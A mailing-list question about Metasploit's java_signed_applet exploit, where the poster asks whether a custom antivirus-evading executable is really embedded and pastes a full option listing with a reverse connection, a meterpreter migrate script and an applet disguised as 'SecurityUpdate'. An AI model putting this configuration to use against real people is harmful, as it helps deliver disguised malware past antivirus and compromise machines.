java_signed_applet

[la zariguella <lazariguella () gmail com>]

Hi guys, i am trying to use a custom generated executable with the
java_signed_applet exploit. For this i am using the advanced option
EXE::Custom.
I test the generated exe payload alone, on the target system, and the AV
don't detect my file. So , is really metasploit using my custom exe to
generate the jar file or i am missing something here?

Here are my settings:

 Name                      Value
  ----                      -----
  APPLETNAME           SecurityUpdate
  AutoLoadStdapi          true
  AutoRunScript
/pentest/exploits/framework3/scripts/meterpreter/migrate.rb -k -f
  AutoSystemInfo          true
  CERTCN                    SiteLoader
  DisablePayloadHandler     false
  EXE::Custom               /pentest/exploits/framework3/custom.exe
  EXE::FallBack             false
  EXE::Inject               false
  EXE::OldMethod            false
  EXITFUNC                  process
  EnableContextEncoding     false
  EnableUnicodeEncoding     true
  HTML::base64              none
  HTML::javascript::escape  0
  HTML::unicode             none
  HTTP::chunked             false
  HTTP::compression         none
  HTTP::header_folding      false
  HTTP::junk_headers        false
  HTTP::server_name         Apache
  InitialAutoRunScript
  LHOST                     192.168.1.10
  LPORT                     4444
  ReverseConnectRetries     5
  SRVHOST                   192.168.1.10
  SRVPORT                   80
  SSL                       false
  SSLVersion                SSL3
  TARGET                    1
  TCP::max_send_size        0
  TCP::send_delay           0
  URIPATH                   /
  VERBOSE                   true

I am using svn Metasploit 4.2.0-dev r14325 updated today (2011.11.30) on
Ubuntu 11.04 system

Thanks for your help!

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework